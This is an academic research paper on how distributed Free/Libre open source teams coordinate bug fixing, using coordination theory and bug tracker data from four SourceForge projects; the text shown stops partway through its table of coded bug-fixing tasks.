In this article, we investigate the coordination practices for software bug fixing in Free/Libre open source software (FLOSS) development teams. Key to our interest is that most FLOSS software is developed by distributed teams, that is, geographically dispersed groups of individuals working together over time towards a common goal (Ahuja et al., 1997, p. 165; Weisband, 2002). FLOSS developers contribute from around the world, meet face to face infrequently, if at all, and coordinate their activity primarily by means of computer-mediated communications (Raymond, 1998; Wayner, 2000). As a result, distributed teams
employ processes that span traditional boundaries of place and ownership. Since such teams are increasingly used in a diversity of settings, it is important to understand how team members can effectively coordinate their work. The research literature on distributed work and on software development specifically emphasizes the difficulties of distributed software development, but the case of FLOSS development presents an intriguing counter-example, at least in part: a number of projects have been outstandingly successful. What is perhaps most surprising is that FLOSS development teams seem not to use many traditional coordination mechanisms such as formal planning, system-level design, schedules, and defined development processes (Mockus et al., 2002, p. 310). As well, many (though by no means all) programmers contribute to projects as volunteers, without working for a common organization and/or being paid. The contribution of this article is to document the process of coordination in effective FLOSS teams for a particularly important process, namely bug fixing. These practices are analyzed by adopting a process theory; that is, we investigate which tasks are accomplished, how and by whom they are assigned, coordinated, and performed. In particular, we selected four FLOSS projects, inductively coded the steps involved in fixing various bugs as recorded in the projects' bug tracking systems, and applied coordination theory to identify the tasks and coordination mechanisms carried out within the bug-fixing process. Studying the coordination of FLOSS processes is important for several reasons. First, FLOSS development is an important phenomenon deserving of study in itself. FLOSS is an increasingly important commercial issue involving all kinds of software firms. Millions of users depend on systems such as Linux and the Internet (heavily dependent on FLOSS software tools), but as Scacchi notes, "little is known about how people in these communities coordinate software development across different settings, or about what software
processes, work practices, and organizational contexts are necessary to their success" (Scacchi, 2002, p. 1; Scacchi, 2005). Understanding the reasons that some projects are effective while others are not is a further motivation for studying FLOSS development processes. Second, studying how distributed software developers coordinate their efforts to ensure, at least in some cases, high-performance outcomes has both theoretical and managerial implications. It can help in understanding the coordination practices adopted in social collectives that are not governed, at least apparently, by a formal organizational structure and are characterized by many other discontinuities, that is, a lack of coherence in some aspects of the work setting: organization, function, membership, language, culture, etc. (Watson-Manheim et al., 2002). As to the managerial implications, distributed teams of all sorts are increasingly used in many organizations. The study could be useful to managers who are considering the adoption of this organizational form, and not only in the field of software development. The remainder of the article is organized as follows. In Section 2 we discuss the theoretical background of the study. In Section 3 we stress the relevance of process theory, thus explaining why we adopted such a theoretical approach. We then describe coordination theory and use it to describe the bug-fixing process as carried out in traditional organizations. The research methodology adopted to study the bug-fixing process is described in Section 4. In Sections 5 and 6 we describe and discuss the study's results. Finally, in Section 7 we draw some conclusions and propose future research directions.
BACKGROUND

In this section we provide an overview of the literature on software development in distributed environments and on the FLOSS phenomenon.
Distributed Software Development

Distributed teams offer numerous potential benefits, such as the possibility of performing different projects all over the world without paying the costs associated with travel or relocation, the ease of reconfiguring teams to quickly respond to changing business needs (DeSanctis & Jackson, 1994; Drucker, 1988), or the ability to exploit available competences and distributed expertise (Grinter et al., 1999; Orlikowski, 2002). Distributed teams seem particularly attractive for software development, because software, as an information product, can be easily transferred via the same systems used to support the teams (Nejmeh, 1994; Scacchi, 1991). Furthermore, while many developed countries face a shortage of talented software developers, some developing countries have a pool of skilled professionals available, at lower cost (Metiu & Kogut, 2001, p. 4; Taylor, 1998). As well, the need to have local developers in each country for marketing and localization has made distributed teams a business need for many global software corporations (Herbsleb & Grinter, 1999b, p. 85). While distributed teams have many potential benefits, distributed workers face many real challenges. The specific challenges vary from team to team, as there is a great diversity in their composition and in the setting of distributed work. As mentioned, distributed work is characterized by numerous discontinuities that generate difficulties for members in making sense of the task and of communications from others, or produce unintended information filtering (de Souza, 1993). These interpretative difficulties make it hard for team members to develop a shared mental model of the developing project (Curtis et al., 1990, p. 52). A lack of common knowledge about the status, authority and competencies of participants brought together for the first time can be an obstacle to the creation of a social structure and
the development of team norms (Bandow, 1997, p. 88) and conventions (Weisband, 2002), thus frustrating the potential benefits of increased flexibility. Numerous studies have investigated social aspects of software development teams (e.g., Curtis et al., 1988; Humphrey, 2000; Sawyer & Guinan, 1998; Walz et al., 1993). These studies conclude that large system development requires knowledge from many domains, which is thinly spread among different developers (Curtis et al., 1988). As a result, large projects require a high degree of knowledge integration and the coordinated efforts of multiple developers (Brooks, 1975). However, coordination is difficult to achieve as software projects are non-routine, hard to decompose perfectly, and face requirements that are often changing and conflicting, making development activities uncertain. Unfortunately, the problems of software development seem to be exacerbated when development teams work in a distributed environment with a reduced possibility for informal communication (Bélanger, 1998; Carmel & Agarwal, 2001; Herbsleb & Grinter, 1999a). In response to the problems created by discontinuities, studies of distributed teams stress the need for a significant amount of time spent in "community building" (Butler et al., 2002). In particular, members of distributed teams need to learn how to communicate, interact and socialize using CMC. Successful distributed cross-functional teams share knowledge and information and create new practices to meet the task-oriented and social needs of the members (Robey et al., 2000). Research has shown the importance of the formal and informal coordination mechanisms adopted, of information sharing for coordination and communications, and of conflict management for project performance and quality (Walz et al., 1993). However, the processes of coordination suitable for distributed teams are still open topics for research (e.g., Orlikowski, 2002).
The FLOSS Phenomenon: A Literature Overview

The growing literature on FLOSS has addressed a variety of questions. Some researchers have examined the implications of free software from economic and policy perspectives (e.g., Di Bona et al., 1999; Kogut & Metiu, 2001; Lerner & Tirole, 2001) as well as from a social perspective (e.g., Bessen, 2002; Franck & Jungwirth, 2002; Hann et al., 2002; Hertel et al., 2003; Markus et al., 2000). Other studies examine factors for the success of FLOSS projects (Hallen et al., 1999; Leibovitch, 1999; Pfaff, 1998; Prasad, n.d.; Valloppillil, 1998; Valloppillil & Cohen, 1998; Crowston & Scozzi, 2003). Among them, an open research question deals with the analysis of how the contributions of multiple developers can be brought into a single working product (Herbsleb & Grinter, 1999b). To answer such a question, a few authors have investigated the processes of FLOSS development (e.g., Jensen & Scacchi, 2005; Stewart & Ammeter, 2002). The most well-known model developed to describe FLOSS organization structure is the bazaar metaphor proposed by Raymond (1998). As in a bazaar, FLOSS developers autonomously decide the schedule and contribution modes for software development, making a central coordination action superfluous. While still popular, the bazaar metaphor has been broadly criticized (e.g., Cubranic, 1999). According to its detractors, the bazaar metaphor disregards some aspects of the FLOSS development process, such as the importance of the project leader's control, the existence of de-facto hierarchies, the danger of information overload and burnout, the possibility of conflicts that cause a loss of interest in a project or forking, and the only apparent openness of these communities (Bezroukov, 1999a, 1999b). Nevertheless, many features of the bazaar model do seem to apply. First, many teams are largely self-organizing, often without formally appointed leaders or formal indications of rank
or role. Individual developers may play different roles in different projects or move from role to role as their involvement with a project changes. For example, a common route is for an active user to become a co-developer by contributing a bug fix or code for a new feature, and for active and able co-developers to be invited to become members of the core. Second, coordination of project development happens largely (though not exclusively) in a distributed mode. Members of a few of the largest and most well-established projects do have the opportunity to meet face-to-face at conferences (e.g., Apache developers at ApacheCon), but such an opportunity is rare for most project members. Third, non-member involvement plays an important role in the success of the teams. Non-core developers contribute bug fixes, new features or documentation, provide support for new users and fill a variety of other roles in the teams. Furthermore, even though the core group provides a form of leadership for a project, they do not exercise hierarchical control. A recent study documented that self-assignment is a typical coordination mechanism in FLOSS projects and direct assignments are nearly nonexistent (Crowston et al., 2005). In comparison to traditional organizations then, more people can share power and be involved in FLOSS project activities. However, how these diverse contributions can be harnessed to create a coherent product is still an important question for research. Our article addresses this question by examining in detail a particular case, namely, coordination of bug-fixing processes.
CONCEPTUAL DEVELOPMENT

In this section, we describe the theoretical perspectives we adopted to examine the coordination of bug fixing, namely, a process-oriented perspective and coordination theory. We also introduce the topic of coordination and discuss
the literature on coordination in software development and the (small) literature on coordination in FLOSS teams.
Processes as Theories

Most theories in organizational and information system research are variance theories, comprising constructs or variables and propositions or hypotheses linking them. By adopting a statistical approach, such theories predict the levels of dependent or outcome variables from the levels of independent or predictor variables, where the predictors are seen as necessary and sufficient for the outcomes. In other words, the logical structure of such theories is that if concept a implies concept b, then more of a means more (or less) of b. For example, the hypothesis that the adoption of ICT makes organizations more centralized, examined as a variance theory, is that the level of organizational centralization increases with the number of new ICTs adopted. An alternative to a variance theory is a process theory (Markus & Robey, 1988). Rather than relating levels of variables, process theories explain how outcomes of interest develop through a sequence of events. In that case, antecedents are considered as necessary but not sufficient for the outcomes (Mohr, 1982). For example, a process model of ICT and centralization might posit several steps, each of which must occur for the organization to become centralized, such as development and implementation of an ICT system and use of the system to control decision premises and program jobs, resulting in centralization of decision making as an outcome (Pfeffer, 1978). However, if any of the intervening steps does not happen, a different outcome may occur. For example, if the system is used to provide information directly to lower-level workers, decision making may become decentralized rather than centralized (Zuboff, 1988). Of course, theories
may contain some aspects of both variance and process theories (e.g., a variance theory with a set of contingencies), but for this discussion, we describe the pure case. Typically, process theories are of some transient process leading to exceptional outcomes, for example, events leading up to an organizational change or to acceptance of a system. However, we will focus instead on what might be called “everyday” processes: those performed regularly to create an organization’s products or services. For example, Sabherwal and Robey (1995) described and compared the processes of information systems development for 50 projects to develop five clusters of similar processes. Kaplan (1991, p. 593) states that process theories can be “valuable aids in understanding issues pertaining to designing and implementing information systems, assessing their impacts, and anticipating and managing the processes of change associated with them”. The main advantage of process theories is that they can deal with more complex causal relationships than variance theories. Also they embody a fuller description of the steps by which inputs and outputs are related, rather than noting the relationship between the levels of input and output variables. Specifically, representing a process as a sequence of activities provides insight into the linkage between individual work and processes, since individuals perform the various activities that comprise the process. As individuals change what they do, they change how they perform these activities and thus their participation in the process. Conversely, process changes demand different performances from individuals. ICT use might simply make individuals more efficient or effective at the activities they have always performed. However, an interesting class of impacts involves changing which individuals perform which activities and how activities are coordinated. Such an analysis is the aim of this article.
Coordination of Processes In this subsection, we introduce the topic of coordination and present the fundamentals of coordination theory. Studying coordination means analyzing how dependences that emerge among the components of a system are managed. That stands for any kind of system, for example, social, economics, organic, or information system. Hence, the coordination of the components of a system is a phenomenon with a universal relevance (Boulding, 1956). The above definition of coordination is consistent with the large body of literature developed in the field of organization theory (e.g., Galbraith, 1973; Lawrence & Lorsch, 1967; Mintzberg, 1979; Pfeffer & Salancik, 1978; Thompson, 1967) that emphasizes the importance of interdependence. For example, according to Thompson (1967), organizational action consists of the coordination of the interdependences and the reduction of the costs associated to their management. Two components/systems are said to be interdependent if the action carried out by one of them affect the other one’s output or performance (McCann & Ferry, 1979; Mohr, 1971; Victor & Blackburn, 1987). For space reason, it is not possible to present all the contributions on coordination in the literature, but because of its relevance, we here briefly report on Thompson’s seminal work. Thompson (1967) identified three main kinds of interdependence, namely pooled, sequential and reciprocal interdependence. Pooled interdependence occurs among organization units that have the same goal but do not directly collaborate to achieve it. Sequential dependence emerges among serial systems. A reciprocal dependence occurs when the output of a system is the input for a second system and vice versa. The three kinds of interdependence require coordination mechanisms whose cost increases going from the first to the last one. The coordination by standardization, that is, routine and rules, is sufficient to manage
pooled-dependent systems. Coordination by plan implies the definition of operational schemes and plans. It can be used to manage pooled and sequential dependences. Finally, coordination by mutual adjustment is suitable for the management of reciprocal dependences. The interest devoted by scholars and practitioners to the study of coordination problems has recently increased due to the growing complexity of products and production processes and to the rapid advancement in science and technology. To address these issues scholars have developed coordination theory, a systemic approach to the study of coordination (Malone & Crowston, 1994). Coordination theory synthesizes the contributions proposed in different disciplines to develop a systemic approach to the study of coordination. Studies on coordination have been developed based on two levels of analysis, a micro and a macro level. In particular, most organization studies adopt a macro perspective, considering dependencies emerging among organizational units. Other studies adopt a micro perspective, considering dependencies emerging among single activities/actors. Coordination theory adopts the latter perspective and, in particular, focuses on the analysis of dependencies among activities (rather than actors). Hence, it is particularly useful for the description and analysis of organizational processes, which can be defined as a set of interdependent activities aimed at the achievement of a goal (Crowston, 1997; Crowston & Osborn, 2003). In particular, this approach has the advantage of making it easier to model the effects of reassignments of activities to different actors, which is common in process redesign efforts. We adopted this perspective because the study focuses on analyzing coordination mechanisms within processes. Consistent with the definition proposed above, Malone and Crowston (1994) analyzed group action in terms of actors performing interdependent tasks. These tasks might require or create
resources of various types. For example, in the case of software development, actors include the customers and various employees of the software company. Tasks include translating aspects of a customer’s problem into system requirements and code, or bug reports into bug fixes. Finally, resources include information about the customer’s problem and analysts’ time and effort. In this view, actors in organizations face coordination problems arising from dependencies that constrain how tasks can be performed. It should be noted that in developing this framework, Malone and Crowston (1994) describe coordination mechanisms as relying on other necessary group functions, such as decision making, communications, and development of shared understandings and collective sensemaking (Britton et al., 2000; Crowston & Kammerer, 1998). To develop a complete model of a process would involve modeling all of these aspects: coordination, decision making, and communications. In this article though, we will focus on the coordination aspects, bracketing the other phenomenon. Coordination theory classifies dependencies as occurring between a task and a resource, among multiple tasks and a resource, and among a task and multiple resources. Dependencies between a task and a resource are due to the fact that a task uses or creates a resource. Shared use of resources can in turn lead to dependencies between the tasks that use or create the resource. These dependencies come in three kinds. First, the flow dependence resembles the Thompson’s sequential dependency. Second, the fit dependence occurs when two activities collaborate in the creation of an output (though in the case where the output is identical, this might better be called synergy, since the benefit is that duplicate work can be avoided). Finally, the share dependency emerges among activities that share the use of a resource. Dependencies between a task and multiple resources are due to the fact that a task uses, creates or produces multiple resources or a
task uses a resource and creates another resource. For example, in the case of software development, a design document might be created by a design task and used by programming tasks, creating a flow dependency, while two development tasks might both require a programmer (a share dependency) and create outputs that must work together (a fit dependency). The key point in this analysis is that dependencies can create problems that require additional work to manage (or provide the opportunity to avoid duplicate work). To overcome the coordination problems created by dependences, actors must perform additional work, which Malone and Crowston (1994) called coordination mechanisms. For example, if particular expertise is necessary to perform a particular task (a task-actor dependency), then an actor with that expertise must be identified and the task assigned to him or her. There are often several coordination mechanisms that can be used to manage a dependency. For example, mechanisms to manage the dependency between an activity and an actor include (among others): (1) having a manager pick a subordinate to perform the task; (2) assigning the task to the first available actor; and (3) having a labour market in which actors bid on jobs. To manage a usability subdependency, the resource might be tailored to the needs of the consumer (meaning that the consumer has to provide that information to the producer) or a producer might follow a standard so the consumer knows what to expect. Mechanisms may be useful in a wide variety of organizational settings. Conversely, organizations with similar goals achieved using more or less the same set of activities will have to manage the same dependencies, but may choose different coordination mechanisms, thus resulting in different processes. Of course, the mechanisms are themselves activities that must be performed by some actors, and so adding coordination mechanisms to a process may create additional dependences that must themselves be managed.
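To make this typology concrete, the dependencies and example mechanisms just listed can be written down as simple data structures; the following is a minimal sketch (the Python names are chosen here for illustration and are not taken from Malone and Crowston):

```python
from enum import Enum

class Dependency(Enum):
    # dependencies among tasks that use or create a common resource
    FLOW = "one task creates a resource that another task uses"
    FIT = "two tasks jointly contribute to a single output"
    SHARE = "two tasks use the same resource"
    # dependency between a task and the actor who performs it
    TASK_ACTOR = "a task requires an actor with particular expertise"

# candidate coordination mechanisms for a dependency (examples from the text)
MECHANISMS = {
    Dependency.TASK_ACTOR: [
        "have a manager pick a subordinate to perform the task",
        "assign the task to the first available actor",
        "run a labour market in which actors bid on jobs",
    ],
    Dependency.FLOW: [
        "tailor the resource to the needs of the consumer (usability)",
        "have the producer follow a standard the consumer knows",
    ],
}

for dependency, mechanisms in MECHANISMS.items():
    print(dependency.name, "->", "; ".join(mechanisms))
```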
Coordination in Software Development Coordination has long been a key issue in software development (e.g., Brooks, 1975; Conway, 1968; Curtis et al., 1988; Faraj & Sproull, 2000; Kraut & Streeter, 1995; Parnas, 1972). For example, Conway (1968) observed that the structure of a software system mirrors the structure of the organization that develops it. Both Conway (1968) and Parnas (1972) studied coordination as a crucial part of software development. Curtis et al. (1988) found that in large-scale software projects, coordination and communication are among the most crucial and hard-to-manage problems. To address such problems, software development researchers have proposed different coordination mechanisms, such as planning, defining and following a process, managing requirements and design specifications, measuring process characteristics, organizing regular meetings to track progress, and implementing workflow systems, among others. Herbsleb and Grinter (1999b), in a study of geographically-distributed software development within a large firm, showed that some of the previously mentioned coordination mechanisms—namely integration plans, component-interface specifications, software processes and documentation—failed to support coordination if not properly managed. The mechanisms needed to be modified or augmented (allowing for the filling in of details, handling exceptions, coping with unforeseen events and recovering from errors) to allow the work to proceed. They also showed that the primary barriers to coordination were the lack of unplanned contact, the difficulty of knowing whom to contact about what, the cost of initiating a contact, limits on the ability to communicate effectively, and a lack of trust or willingness to communicate openly. Kraut and Streeter (1995), in studying the coordination practices that influence the sharing of information and success of software development, identified the following coordination
techniques: formal-impersonal procedures (project documents and memos, project milestones and delivery schedules, modification-request and error-tracking procedures, data dictionaries), formal-interpersonal procedures (status-review meetings, design-review meetings, code inspections), and informal-interpersonal procedures (group meetings and co-location of requirements and development staff, electronic communication such as e-mail and electronic bulletin boards, and interpersonal networks). Their results showed the value of both informal and formal interpersonal communication for sharing information and achieving coordination in software development. Note though that this analysis focuses more on the media for exchanging information than on the particular dependencies or coordination mechanisms that might be executed via these media. That is, once you have called a group meeting, what should you talk about?
Coordination in FLOSS Development A few studies have examined the work practices and coordination modes adopted by FLOSS teams in more detail, which is the focus of this article (Iannacci, 2005; Scacchi, 2002; Weber, 2004). Cubranic (1999) observed that the main media used for coordination in FLOSS development teams were mailing lists. Such a low-tech approach is adopted to facilitate the participation of wouldbe contributors, who may not have access to or experience with more sophisticated technology. The geographical distribution of contributors and the variability in time of contributors precluded the use of other systems (e.g., systems that support synchronous communication or prescriptive coordination technology, such as workflow systems). Mailing lists supported low-level coordination needs. Also, Cubranic (1999) found no evidence of the use of higher-level coordination, such as group decision making, knowledge management, task scheduling and progress tracking. As they are the main coordination mechanisms, the volume
of information within mailing lists can be huge. Mailing lists are therefore often unique repositories of source information on design choices and evolution of the system. However, dealing with this volume of information in large open source software projects can require a large amount of manual and mental effort from developers, who have to rely on their memory to compensate for the lack of adequate tools and automation. In a well-known case study of two important FLOSS projects, namely Apache and Mozilla, Mockus et al. (2002) distinguished explicit (e.g., interface specification processes, plans, etc.) and implicit coordination mechanisms adopted for software development. They argued that, because of its software structure, the Apache development team had primarily adopted implicit coordination mechanisms. The basic server was kept small. Core developers worked on what interested them and their opinion was fundamental when adding new functionality. The functionality beyond the basic server was added by means of various ancillary projects, developed by a larger community that interacted with Apache only through defined interfaces. Such interfaces coordinate the effort of the Apache developers: as they had to be designed based on what Apache provided, the effort of the Apache core group was limited. As a result, coordination relied on the knowledge of who had expertise in a given area and general communication on who is doing what and when. On the other hand, in the Mozilla project, because of the interdependence among modules, considerable effort is spent in coordination. In this case, more formal and explicit coordination mechanisms were adopted (e.g., module owners were appointed who had to approve all changes in their module). Jensen & Scacchi (2005) modelled the software-release process in three projects, namely Mozilla, Apache and NetBeans. They identified tasks, their dependencies and the actors performing them. However, they did not analyze the coordination issues in depth and did not focus
specifically on the bug-fixing process, which is the aim of this article. Rather, their final goal was to study the relationships among the three communities that form a Web Information Infrastructure. Iannacci (2005) adopted an organizational perspective to study coordination processes within a single large-scale and well-known FLOSS development project, Linux. He identified three main (traditional) coordination mechanisms, namely standardization, loose coupling and partisan mutual adjustment. Standardization is a coordination mechanism to manage pooled dependencies emerging among different contributors. It implies the definition of well-defined procedures, such as in the case of patch submission or bug-fixing procedures. Loose coupling is used to manage sequential dependencies among the different subgroups of contributors. It is the coordination mechanism used, for example, to incorporate new patches. Finally, partisan mutual adjustment is a mechanism used to manage what Iannacci (2005) called networked interdependencies, an extension of the reciprocal dependencies as proposed by Thompson (1967). Networked interdependencies are those emerging among contributors to specific parts of the software. Partisan mutual adjustment produces a sort of structuring process, thus creating an informal (sub-)organization. However, these findings are based on a single exceptional case, the Linux project, making it unclear how much can be generalized to smaller projects. Indeed, most of the existing studies are of large and well-known projects and focus on the development process. To our knowledge, no studies have analyzed the bug-fixing process in depth within small FLOSS development teams.
A Coordination Theory Application: The Bug-Fixing Process To ground our discussion of coordination theory, we will briefly introduce the bug-fixing process, which consists of the tasks needed to correct
software bugs. We decided to focus on the bug-fixing process for three reasons. First, bug fixing provides “a microcosm of coordination problems” (Crowston, 1997). Second, a quick response to bugs has been mentioned as a particular strength of the FLOSS process: as Raymond (1998) puts it, “given enough eyeballs, all bugs are shallow”. Finally, it is a process that involves the entire developer community and thus poses particular coordination problems. While there have been several studies of FLOSS bug fixing, few have analyzed coordination issues within the bug-fixing process by adopting a process view. For example, Sandusky et al. (2004) analyzed the bug-fixing process. They focus their attention on the identification of the relationships existing among bug reports, but they do not examine in detail the process itself. In contrast to the prior work, our article provides empirical evidence about coordination practices within FLOSS teams. Specifically, we describe the way the work of bug fixing is coordinated in these teams and how these practices differ from those of conventional software development, and thus suggest what might be learned from FLOSS and applied in other settings. We base our description on the work of Crowston (1997), who described the bug-fixing process observed at a commercial software company. Such a process is defined below as traditional because 1) it is carried out within a traditional kind of organization (i.e., the boundaries are well defined, the environment is not distributed, the organization structure is defined) and 2) it refers to the production of commercial rather than FLOSS software. The process is started by a customer who finds a problem when using a software system. The problem is reported (sometimes automatically or by the customer) to the company’s response center. In the attempt to solve the problem, personnel in the center look in a database of known bugs. If a match is found, the fix is returned to the customer; otherwise, after identifying the affected product, the bug report is forwarded to an engineer in the marketing center. The assigned engineer tries
to reproduce the problem and identify the cause (possibly requesting additional information from the reporter to do so). If the bug is real, the bug report is forwarded to the manager responsible for the module affected by the bug. The manager then assigns the bug to the software engineer responsible for that module. The software engineer diagnoses the problem (if she finds that the problem is in a different module, the report is forwarded to the right engineer) and designs a fix. The proposed fix is shared with other engineers responsible for modules that might be affected. When the feedback from those engineers is positive, the proposed design is transformed into lines of code. If changes in other modules are needed, the software engineer also asks the responsible engineers for changes. The proposed fix is then tested, and any changed modules are sent to the integration manager. After approval, the integration manager recompiles the system, tests the entire system and releases the new software in the form of a patch. To summarize then, in the traditional bug-fixing process, the following tasks have been identified (Crowston, 1997): Report, Try to solve the problem, Search database for solution, Forward to the marketing manager, Try to solve the problem/Diagnose the problem, Forward to the Software Engineering Group, Assign the bug, Diagnose the problem, Design the fix, Verify affected modules and ask for approval, Write the code for the fix, Test it, Integrate changes, Recompile the module and link it to the system. After describing the above process, Crowston (1997) went on to analyze the coordination mechanisms employed. A number of the tasks listed can be seen as coordination mechanisms. For example, the search for duplicate bugs as well as the numerous forward and verify tasks manage some dependency. Searching for duplicate outputs is the coordination mechanism to manage a dependency between two tasks that might have the same output. In this case, the tasks are to respond
to bug reports from customers. These tasks can be performed by diagnosing and repairing the bug, but if the solution to the bug report can be found in the database, then the effort taken to solve it a second time can be avoided. Thus, searching the database for a solution is a way to manage a potential dependency between the two bug-fixing tasks. Forwarding and verifying tasks are coordination mechanisms used to manage the dependency between a task and the actor appropriate to perform that task. These steps are needed because many actors are involved in the process and each of them carries out a very specialized task, requiring additional work to find an appropriate person to perform each task.
RESEARCH METHODOLOGY To address our research question, how are bug fixes coordinated in FLOSS projects, we carried out a multiple case study of different FLOSS projects, using the theoretical approach developed in the previous section. In this section, we discuss sample selection and data sources, data collection and data analysis, deferring a discussion of our findings to the following section.
Sample Selection In this sub-section we describe the basis for selecting projects for analysis. Projects to be studied were selected from those hosted on SourceForge (http://sourceforge.net/), a Web-based system that currently supports the development of more than 100,000 FLOSS projects (although only a small proportion of these are actually active). We chose to examine projects from a single source to control for differences in available tools and project visibility. Because the process of manually reading, rereading, coding and recoding messages is extremely labor-intensive, we had to focus our attention on a small number of projects. We selected projects to study in-depth by employing
a theoretical sampling strategy based on several practical and theoretical dimensions. First, we chose projects for which the data we needed for our analysis were publicly available, meaning a large number of bug reports. (Not all projects use or allow public access to the bug-tracking system.) Second, we chose teams with more than 8 developers (i.e., those with write access to the source code control system), since smaller projects seemed less likely to experience significant coordination problems. The threshold of eight members was chosen based on our expectation that coordinating tasks within a team would become more complicated as the number of members increases. We assumed that each member of the team could manage 4 or 5 relationships, but with eight members (and hence up to seven relationships per member), we expected some difficulty in coordination to arise. Only 140 projects on SourceForge met the first two requirements in 2002 when we drew our sample. Third, projects were chosen so as to provide some comparison in the target audience and addressed topic, as discussed below. Finally, because we wanted to link coordination practices to project effectiveness, we tried to select more and less effective development teams. To this aim we used the definitions of effectiveness proposed by Crowston et al. (2006a), who suggest that a project is effective if it is active, the resulting software is downloaded and used and the team continues in operation. We selected four FLOSS projects that satisfied these criteria. Specifically, from the 140 large active projects, we selected two desktop chat clients that are aimed at end users (KICQ and Gaim) and two projects aimed primarily at developers (DynAPI, a dynamic HTML library, and phpMyAdmin, a Web-based database administration tool). A brief description of the projects is reported in Table 1, including the project goal, age at the time of the study, volume of communication and team membership. A consequence of the requirement of a significant number of bug reports is that all four projects are relatively advanced, making them representative of mature FLOSS projects. Based on the definition
Table 1. Four examined projects

KICQ — Goal: ICQ client for the KDE project (a chat client); Registration date: 1999-11-19; Development status: 4 Beta, 5 Production Stable; License: GPL; Intended audience: Developers, End Users/Desktop; Topic: ICQ, K Desktop Environment (KDE); Open bugs/total bugs: 26/88; Open support requests/total requests: 12/18; Open patches/total patches: 1/8; Open feature requests/total requests: 9/9; Mailing lists: 813 messages in 3 mailing lists; Team members: 9; Team member roles (# in role): admin/project manager (2), packager (1), developers (3), advisor/mentor/consultant (1), not specified (2).

DynAPI — Goal: Dynamic HTML library; Registration date: 2000-05-15; Development status: 5 Production Stable; License: LGPL, GPL; Intended audience: Developers; Topic: Dynamic Content; Open bugs/total bugs: 45/220; Mailing lists: 9595 messages in 5 mailing lists; Team members: 11; Team member roles (# in role): admin/project manager (1), developers (4), admin (3), not specified (3).

Gaim — Goal: Multi-platform AIM client (a chat client); Registration date: 1999-11-13; Development status: 5 Production Stable; License: GPL; Intended audience: Advanced End Users, Developers, End Users/Desktop; Topic: AOL Instant Messenger, ICQ, Internet Relay Chat, MSN Messenger; Open bugs/total bugs: 14/144; Team members: 9; Team member roles (# in role): project manager (1), admin/developer (1), support manager (1), web designer (1), developers (3), not specified (2).

phpMyAdmin — Goal: Web-based database administration; Registration date: 2001-03-18; Development status: 5 Production Stable; License: GPL; Intended audience: Developers, End Users/Desktop, System Administrators; Topic: Front-Ends, Dynamic Content, Systems Administration; Open bugs/total bugs: 269/1499; Team members: 10.
proposed by Crowston et al. (2006a), Kicq, Gaim and phpMyAdmin were chosen as examples of effective projects because they were active, the resulting software was being downloaded and the group had been active for a while. DynAPI was chosen as an example of a less effective project because the number of downloads and programming activity had rapidly decreased in the months leading up to the study.
Data Collection In this sub-section we describe how data were selected and collected. As mentioned above, all of these projects are hosted on SourceForge, making certain kinds of data about them easily accessible for analysis. However, analysis of these data poses some ethical concerns that we had to address in gaining human subjects approval for our study. On the one hand, the interactions recorded are all public and developers have no expectations of privacy for their statements (indeed, the expectation is the opposite, that their comments will be widely broadcast). Consent is generally not required for studies of public behaviour. On the other hand, the data were not made available for research purposes but rather to support the work of the teams. We have gone ahead with our research after concluding that our analysis does not pose any likelihood of additional harm to the poster above the availability of the post to the group and in the archive available on the Internet. We collected several kinds of data about each of the cases. First, we obtained data indicative of the effectiveness of each project, such as its level of activity, number of downloads and development status. Unfortunately, no documentation on the organization structure, task assignment procedures and coordination practices adopted was available on the projects’ web sites (further supporting the position that these teams do not employ formal coordination methods). To get at the bug-fixing process, we considered alternative sources of data. Interviewing the developers might have provided
information about their perceptions of the process, but would have required finding their identities, which was considered problematic given privacy concerns. Furthermore, reliance on self-reported data raises concerns about reliability of the data, the response rate and the likelihood that different developers would have different perceptions. While these issues are quite interesting to study (e.g., to understand how a team develops shared mental models of a project, for example, Crowston & Kammerer, 1998), they seemed like distractions from our main research question. Because of these concerns, we elected to use objective data about the bug-fixing process. Hence, the main source of data about the bug-fixing process was obtained from the archives of the bug tracking system, which is the tool used to support the bug-fixing process (Herbsleb et al., 2001, p. 13). These data are particularly useful because they are unobtrusive measures of the team’s behaviors (Webb & Weick, 1979) and thus provide an objective description of the work that is actually undertaken, rather than perceptions of the work. In the bug tracking system, each bug has a request ID, a summary (what the bug is about), a category (the kind of bug, e.g., system, interface), the name of the team member (or user) who submitted it, and the name of the team member it was assigned to. An example bug report in shown in Figure 1 (the example is fictitious). As well, individuals can post messages regarding the bug, such as further symptoms, requests for more information, etc. From this system, we extracted data about who submitted the bugs, who fixed them and the sequence of messages involved in the fix. By examining the name of the message senders, we can identify the project and community members who are involved in the bug-fixing process. Demographic information for the projects and developers and data from the bug tracking system were collected in the period 17–24 November 2002. We examined 31 closed bugs for Kicq, 95 closed bugs for DynAPI, 51 bugs for Gaim and 51 for PhPMyAdmin. The detailed
Figure 1. Example bug report and followup messages
text of the bug reports is not reported because of space restriction but is available on request.
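The tracker fields just described can be pictured as a simple record structure; the sketch below is purely illustrative (the field names are ours, not the SourceForge schema):

```python
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class Message:
    sender: str   # project or community member posting a follow-up
    text: str     # e.g., further symptoms or a request for more information

@dataclass
class BugReport:
    request_id: str                     # identifier of the bug in the tracker
    summary: str                        # what the bug is about
    category: str                       # kind of bug, e.g., system or interface
    submitted_by: str                   # team member or user who submitted it
    assigned_to: Optional[str] = None   # team member it was assigned to, if any
    messages: List[Message] = field(default_factory=list)

def participants(bug: BugReport) -> set:
    """Project and community members involved in the bug-fixing process."""
    return {bug.submitted_by} | {m.sender for m in bug.messages}
```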
Data Analysis In this section we present our data analysis approach. For each of the bug reports, we carefully examined the text of the exchanged messages to identify the task carried out by each sender. We first applied the framework developed by Checkland & Scholes (1990), who suggested identifying
the owners, customers and environment of the process, the actors who perform it, the transformation of inputs into outputs, the environment and the worldview that makes the process meaningful. We then followed the method described by Crowston & Osborn (2003), who suggested expanding the analysis of the transformation by identifying in more detail the activities carried out in the transformation. We identified the activities by inductively coding the text of the messages in the bug tracking systems of the four projects. We
Table 2. Coded tasks in the bug-fixing process
1.0.0 Submit (S)
  1.1.0 Submit bug (code errors)
    1.1.1 Submit symptoms
    1.1.2 Provide code back trace (BT)
  1.2.0 Submit problems
    1.2.1 Submit incompatibility problems (NC)
2.0.0 Assign (As)
  2.1.0 Bug self-assignment (A*)
  2.2.0 Bug assignment (A)
3.0.0 Analyze (An)
  3.1.0 Contribute to bug identification
    3.1.1 Report similar problems (R)
    3.1.2 Share opinions about the bug (T)
  3.2.0 Verify impossibility to fix the bug
